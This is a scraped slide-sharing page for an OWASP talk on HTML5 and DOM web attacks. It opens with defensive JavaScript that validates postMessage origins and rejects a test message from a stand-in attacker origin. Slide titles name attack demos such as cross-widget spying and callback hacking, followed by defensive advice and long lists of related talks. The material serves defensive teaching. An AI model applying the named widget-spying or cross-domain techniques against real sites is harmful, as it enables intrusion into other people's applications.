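  if (typeof msg === 'string') {
    try { msg = JSON.parse(msg); } catch (e) { return { accepted: false, reason: 'not json' }; }
  }
  if (!msg || typeof msg !== 'object' || !ALLOWED_OPS.has(msg.op)) return { accepted: false, reason: 'op' };
  if (msg.op === 'resize' && !(Number.isInteger(msg.height) && msg.height > 0 && msg.height <= 2000)) {
    return { accepted: false, reason: 'height' };
  }
  if (msg.op === 'openUrl' && !/^https:\/\//.test(String(msg.url))) return { accepted: false, reason: 'url' };
  return { accepted: true, op: msg.op, from: event.origin };
}

// Widget side: always name the target origin; "*" would let a hijacked parent read the data.
function widgetSend(parentWindow, msg) {
  parentWindow.postMessage(JSON.stringify(msg), HOST_ORIGIN);
}

// Constructed events, as the host's window.onmessage would receive them.
console.log(widgetFrameAttributes('https://rss-widget.example.org/widget.html'));
console.log(handleWidgetMessage({ origin: 'https://rss-widget.example.org', data: JSON.stringify({ op: 'resize', height: 300 }) }));
console.log(handleWidgetMessage({ origin: 'https://attacker.example', data: JSON.stringify({ op: 'resize', height: 300 }) }));
widgetSend({ postMessage: (d, o) => console.log('widget -> host', o, d) }, { op: 'resize', height: 300 });
```

Compared with the shared-DOM layout in the diagram, the attacker widget now has nothing to trap: it cannot read the mail widget's variables or events, and the only thing it can send the host is a message the host validates before acting on it.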
Demo

 Cross Widget Spying
 Using DOMScan to review Widget Architecture
 and Access Mechanism
 RSS Feed Hacking
 Mashup Hacks
 Cross Domain Callback Hacking




DEFENDING APPLICATIONS


Security at CODE Level
  JS, Flash or XAP should not carry server-side logic; they should be
  presentation layer only …
  Obfuscation may help a bit; it is not foolproof.
  Source code and object code analysis would be required during blackbox
  testing
  Resource discovery and fuzzing: a must for SOAP, JSON and AMF streams
  Careful with HTML 5 implementation
  DOM based scanning and analysis is required
  Cross streams and third-party analytics
http://shreeraj.blogspot.com
                 shreeraj@blueinfy.com
                 http://www.blueinfy.com




CONCLUSION AND
QUESTIONS
Apache Jackrabbit Oak - Scale your content repository to the cloudApache Jackrabbit Oak - Scale your content repository to the cloud
Apache Jackrabbit Oak - Scale your content repository to the cloud
 
Build and Deploy Your Mobile Games
Build and Deploy Your Mobile Games Build and Deploy Your Mobile Games
Build and Deploy Your Mobile Games
 
OpenID Connect: An Overview
OpenID Connect: An OverviewOpenID Connect: An Overview
OpenID Connect: An Overview
 
Continuous delivery and deployment on AWS
Continuous delivery and deployment on AWSContinuous delivery and deployment on AWS
Continuous delivery and deployment on AWS
 
Spring GraphQL
Spring GraphQLSpring GraphQL
Spring GraphQL
 
How to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech Talks
How to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech TalksHow to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech Talks
How to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech Talks
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS Security
 
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
 
Building Mobile Apps with AWS Amplify
Building Mobile Apps with AWS AmplifyBuilding Mobile Apps with AWS Amplify
Building Mobile Apps with AWS Amplify
 
Building Serverless Backends with AWS Lambda and Amazon API Gateway
Building Serverless Backends with AWS Lambda and Amazon API GatewayBuilding Serverless Backends with AWS Lambda and Amazon API Gateway
Building Serverless Backends with AWS Lambda and Amazon API Gateway
 
[AWS Dev Day] 이머징 테크 | AWS 서버리스를 이용하여 IoT 수준의 메세지 폭풍을 처리하는 방법 - 김민성 AWS 솔루션즈 ...
[AWS Dev Day] 이머징 테크 | AWS 서버리스를 이용하여 IoT 수준의 메세지 폭풍을 처리하는 방법 - 김민성 AWS 솔루션즈 ...[AWS Dev Day] 이머징 테크 | AWS 서버리스를 이용하여 IoT 수준의 메세지 폭풍을 처리하는 방법 - 김민성 AWS 솔루션즈 ...
[AWS Dev Day] 이머징 테크 | AWS 서버리스를 이용하여 IoT 수준의 메세지 폭풍을 처리하는 방법 - 김민성 AWS 솔루션즈 ...
 
Amazon VPC와 ELB/Direct Connect/VPN 알아보기 - 김세준, AWS 솔루션즈 아키텍트
Amazon VPC와 ELB/Direct Connect/VPN 알아보기 - 김세준, AWS 솔루션즈 아키텍트Amazon VPC와 ELB/Direct Connect/VPN 알아보기 - 김세준, AWS 솔루션즈 아키텍트
Amazon VPC와 ELB/Direct Connect/VPN 알아보기 - 김세준, AWS 솔루션즈 아키텍트
 
20191030 AWS Black Belt Online Seminar AWS IoT Analytics Deep Dive
20191030 AWS Black Belt Online Seminar AWS IoT Analytics Deep Dive 20191030 AWS Black Belt Online Seminar AWS IoT Analytics Deep Dive
20191030 AWS Black Belt Online Seminar AWS IoT Analytics Deep Dive
 
How GumGum Migrated from Cassandra to Amazon DynamoDB (DAT345) - AWS re:Inven...
How GumGum Migrated from Cassandra to Amazon DynamoDB (DAT345) - AWS re:Inven...How GumGum Migrated from Cassandra to Amazon DynamoDB (DAT345) - AWS re:Inven...
How GumGum Migrated from Cassandra to Amazon DynamoDB (DAT345) - AWS re:Inven...
 
Monitoring and Orchestration of your Microservices Landscape with Kafka and Z...
Monitoring and Orchestration of your Microservices Landscape with Kafka and Z...Monitoring and Orchestration of your Microservices Landscape with Kafka and Z...
Monitoring and Orchestration of your Microservices Landscape with Kafka and Z...
 
Building Secure Architectures on AWS
Building Secure Architectures on AWSBuilding Secure Architectures on AWS
Building Secure Architectures on AWS
 
Amazon Virtual Private Cloud (VPC) - Networking Fundamentals and Connectivity...
Amazon Virtual Private Cloud (VPC) - Networking Fundamentals and Connectivity...Amazon Virtual Private Cloud (VPC) - Networking Fundamentals and Connectivity...
Amazon Virtual Private Cloud (VPC) - Networking Fundamentals and Connectivity...
 
AWS Lambda
AWS LambdaAWS Lambda
AWS Lambda
 
Network Security and Access Control in AWS
Network Security and Access Control in AWSNetwork Security and Access Control in AWS
Network Security and Access Control in AWS
 

Viewers also liked

Angularjs Basics
Angularjs BasicsAngularjs Basics
Angularjs Basics
Anuradha Bandara
 
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
Valeri Karpov
 
AngularJS for designers and developers
AngularJS for designers and developersAngularJS for designers and developers
AngularJS for designers and developers
Kai Koenig
 
Dom selecting & jQuery
Dom selecting & jQueryDom selecting & jQuery
Dom selecting & jQuery
Kim Hunmin
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
Shreeraj Shah
 
JavaScript DOM Manipulations
JavaScript DOM ManipulationsJavaScript DOM Manipulations
JavaScript DOM Manipulations
Ynon Perek
 
Introduction to the DOM
Introduction to the DOMIntroduction to the DOM
Introduction to the DOM
tharaa abu ashour
 
Angular 2 interview questions and answers
Angular 2 interview questions and answersAngular 2 interview questions and answers
Angular 2 interview questions and answers
Anil Singh
 
Advanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSAdvanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JS
Simon Guest
 
AngularJS performance & production tips
AngularJS performance & production tipsAngularJS performance & production tips
AngularJS performance & production tips
Nir Kaufman
 
DOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedDOM Features You Didn’t Know Existed
DOM Features You Didn’t Know Existed
FITC
 
Advanced AngularJS Concepts
Advanced AngularJS ConceptsAdvanced AngularJS Concepts
Advanced AngularJS Concepts
Kyle Hodgson
 

Viewers also liked (12)

Angularjs Basics
Angularjs BasicsAngularjs Basics
Angularjs Basics
 
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
 
AngularJS for designers and developers
AngularJS for designers and developersAngularJS for designers and developers
AngularJS for designers and developers
 
Dom selecting & jQuery
Dom selecting & jQueryDom selecting & jQuery
Dom selecting & jQuery
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
JavaScript DOM Manipulations
JavaScript DOM ManipulationsJavaScript DOM Manipulations
JavaScript DOM Manipulations
 
Introduction to the DOM
Introduction to the DOMIntroduction to the DOM
Introduction to the DOM
 
Angular 2 interview questions and answers
Angular 2 interview questions and answersAngular 2 interview questions and answers
Angular 2 interview questions and answers
 
Advanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSAdvanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JS
 
AngularJS performance & production tips
AngularJS performance & production tipsAngularJS performance & production tips
AngularJS performance & production tips
 
DOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedDOM Features You Didn’t Know Existed
DOM Features You Didn’t Know Existed
 
Advanced AngularJS Concepts
Advanced AngularJS ConceptsAdvanced AngularJS Concepts
Advanced AngularJS Concepts
 

Similar to Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
Shreeraj Shah
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
Shreeraj Shah
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
Shreeraj Shah
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery!   shreeraj shahFind me if you can – smart fuzzing and discovery!   shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shah
owaspindia
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007
ClubHack
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web apps
James Pearce
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web Apps
James Pearce
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1
James Pearce
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5
James Pearce
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 Revolution
James Pearce
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2
guest66dc5f
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web apps
James Pearce
 
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns FrameworksMike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
ukdpe
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
Helen
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
Helen
 
Polysource It Profile
Polysource It ProfilePolysource It Profile
Polysource It Profile
elenarys
 
Poly Source It Profile
Poly Source It ProfilePoly Source It Profile
Poly Source It Profile
moseskhedi
 
Building Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsBuilding Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web Apps
James Pearce
 
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Microsoft Developer Network (MSDN) - Belgium and Luxembourg
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Shreeraj Shah
 

Similar to Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2) (20)

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery!   shreeraj shahFind me if you can – smart fuzzing and discovery!   shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shah
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web apps
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web Apps
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 Revolution
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web apps
 
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns FrameworksMike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
 
Polysource It Profile
Polysource It ProfilePolysource It Profile
Polysource It Profile
 
Poly Source It Profile
Poly Source It ProfilePoly Source It Profile
Poly Source It Profile
 
Building Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsBuilding Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web Apps
 
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 

More from Shreeraj Shah

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
Shreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
Shreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj Shah
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
Shreeraj Shah
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
Shreeraj Shah
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
Shreeraj Shah
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
Shreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Shreeraj Shah
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
Shreeraj Shah
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Shreeraj Shah
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
Shreeraj Shah
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Shreeraj Shah
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
Shreeraj Shah
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
Shreeraj Shah
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
Shreeraj Shah
 

More from Shreeraj Shah (15)

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
 

Recently uploaded

System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - HiikeSystem Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
Hiike
 
AWS Cloud Cost Optimization Presentation.pptx
AWS Cloud Cost Optimization Presentation.pptxAWS Cloud Cost Optimization Presentation.pptx
AWS Cloud Cost Optimization Presentation.pptx
HarisZaheer8
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
kumardaparthi1024
 
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStrDeep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
saastr
 
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing InstancesEnergy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Alpen-Adria-Universität
 
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Tatiana Kojar
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
ssuserfac0301
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
MichaelKnudsen27
 
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Jeffrey Haguewood
 
Operating System Used by Users in day-to-day life.pptx
Operating System Used by Users in day-to-day life.pptxOperating System Used by Users in day-to-day life.pptx
Operating System Used by Users in day-to-day life.pptx
Pravash Chandra Das
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
Azure API Management to expose backend services securely
Azure API Management to expose backend services securelyAzure API Management to expose backend services securely
Azure API Management to expose backend services securely
Dinusha Kumarasiri
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
DanBrown980551
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
saastr
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
Jakub Marek
 

Recently uploaded (20)

System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - HiikeSystem Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
 
AWS Cloud Cost Optimization Presentation.pptx
AWS Cloud Cost Optimization Presentation.pptxAWS Cloud Cost Optimization Presentation.pptx
AWS Cloud Cost Optimization Presentation.pptx
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStrDeep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
 
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing InstancesEnergy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
 
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
 
Serial Arm Control in Real Time Presentation

Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)

  • 1. Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2) Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP 22nd Sept. 2011 OWASP AppSec USA 2011 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
